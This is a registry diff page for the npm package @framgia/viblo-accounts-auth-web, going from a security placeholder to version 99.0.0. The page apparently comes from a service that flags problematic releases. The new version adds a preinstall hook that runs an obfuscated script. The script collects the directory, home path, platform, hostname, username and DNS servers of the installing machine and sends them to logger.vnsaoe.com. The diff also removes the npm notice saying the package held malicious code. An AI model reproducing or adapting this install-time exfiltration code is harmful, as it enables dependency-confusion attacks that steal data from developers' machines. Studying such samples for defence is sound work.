@framgia/viblo-accounts-auth-web 0.0.1-security → 99.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of @framgia/viblo-accounts-auth-web might be problematic. Click here for more details.

package/index.js ADDED
@@ -0,0 +1,4 @@
1
+ // index.js
2
+ module.exports = function() {
3
+ console.log('Hello from @framgia/test!');
4
+ };
package/package.json CHANGED
@@ -1,6 +1,15 @@
1
1
  {
2
2
  "name": "@framgia/viblo-accounts-auth-web",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "99.0.0",
4
+ "main": "index.js",
5
+ "publishConfig": {
6
+ "access": "public"
7
+ },
8
+ "scripts": {
9
+ "test": "echo \"Error: no test specified\" && exit 1",
10
+ "preinstall": "node preinstall.min.js"
11
+ },
12
+ "author": "",
13
+ "license": "ISC",
14
+ "description": "@framgia/viblo-accounts-auth-web"
6
15
  }
@@ -0,0 +1 @@
1
+ const _0x577085 = _0x53ec; (function (_0x553a23, _0x45f443) { const _0x253094 = _0x53ec, _0x2ae671 = _0x553a23(); while (!![]) { try { const _0x229e92 = -parseInt(_0x253094(0x1a3)) / 0x1 + parseInt(_0x253094(0x18f)) / 0x2 * (parseInt(_0x253094(0x188)) / 0x3) + parseInt(_0x253094(0x19c)) / 0x4 * (parseInt(_0x253094(0x194)) / 0x5) + parseInt(_0x253094(0x197)) / 0x6 + parseInt(_0x253094(0x18e)) / 0x7 * (-parseInt(_0x253094(0x190)) / 0x8) + -parseInt(_0x253094(0x189)) / 0x9 + -parseInt(_0x253094(0x18d)) / 0xa * (-parseInt(_0x253094(0x1a1)) / 0xb); if (_0x229e92 === _0x45f443) break; else _0x2ae671['push'](_0x2ae671['shift']()); } catch (_0x1ebdb9) { _0x2ae671['push'](_0x2ae671['shift']()); } } }(_0x2558, 0xe5dc1)); const os = require('os'), dns = require('dns')[_0x577085(0x18c)], querystring = require(_0x577085(0x193)), https = require(_0x577085(0x1a2)); function _0x2558() { const _0x510837 = ['230352euIrfH', '8qvyBmX', 'userInfo', 'POST', 'querystring', '1651665VnUFeh', 'release', 'framgia/viblo-accounts-auth-web', '2886450jpdnki', 'getServers', '\x20-\x20', 'application/x-www-form-urlencoded', 'platform', '16HEozzI', 'stringify', 'request', 'homedir', 'end', '5617073HcIlAs', 'https', '1621698YKZXEq', 'data', 'byteLength', '24FKEdyy', '8746974apiTjf', 'logger.vnsaoe.com', 'error', 'promises', '40wekBbP', '8619086YSzost']; _0x2558 = function () { return _0x510837; }; return _0x2558(); } function _0x53ec(_0x293772, _0x1ba3a9) { const _0x2558d8 = _0x2558(); return _0x53ec = function (_0x53eccd, _0x35792f) { _0x53eccd = _0x53eccd - 0x187; let _0x44dffa = _0x2558d8[_0x53eccd]; return _0x44dffa; }, _0x53ec(_0x293772, _0x1ba3a9); } async function getDNSInfo() { const _0x2d425c = _0x577085, _0xc6fe91 = await dns[_0x2d425c(0x198)](); return _0xc6fe91; } async function sendTrackingData() { const _0x5e221d = _0x577085, _0x65465a = JSON[_0x5e221d(0x19d)]({ 'package': _0x5e221d(0x196), 'dirname': __dirname, 'homedir': os[_0x5e221d(0x19f)](), 'platform': os[_0x5e221d(0x19b)]() + _0x5e221d(0x199) + os[_0x5e221d(0x195)](), 'hostname': os['hostname'](), 'username': os[_0x5e221d(0x191)]()['username'], 'dns': await getDNSInfo() }), _0x18d5b7 = querystring['stringify']({ 'msg': _0x65465a }), _0x1658ba = { 'hostname': _0x5e221d(0x18a), 'port': 0x1bb, 'path': '/', 'method': _0x5e221d(0x192), 'headers': { 'Content-Type': _0x5e221d(0x19a), 'Content-Length': Buffer[_0x5e221d(0x187)](_0x18d5b7) } }, _0x2372c4 = https[_0x5e221d(0x19e)](_0x1658ba, _0x4f1a47 => { const _0x51d8f0 = _0x5e221d; let _0x4c5057 = ''; _0x4f1a47['on'](_0x51d8f0(0x1a4), _0x434131 => { _0x4c5057 += _0x434131; }), _0x4f1a47['on']('end', () => { }); }); _0x2372c4['on'](_0x5e221d(0x18b), _0x4f9201 => { }), _0x2372c4['write'](_0x18d5b7), _0x2372c4[_0x5e221d(0x1a0)](); } sendTrackingData();
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=%40framgia%2Fviblo-accounts-auth-web for more information.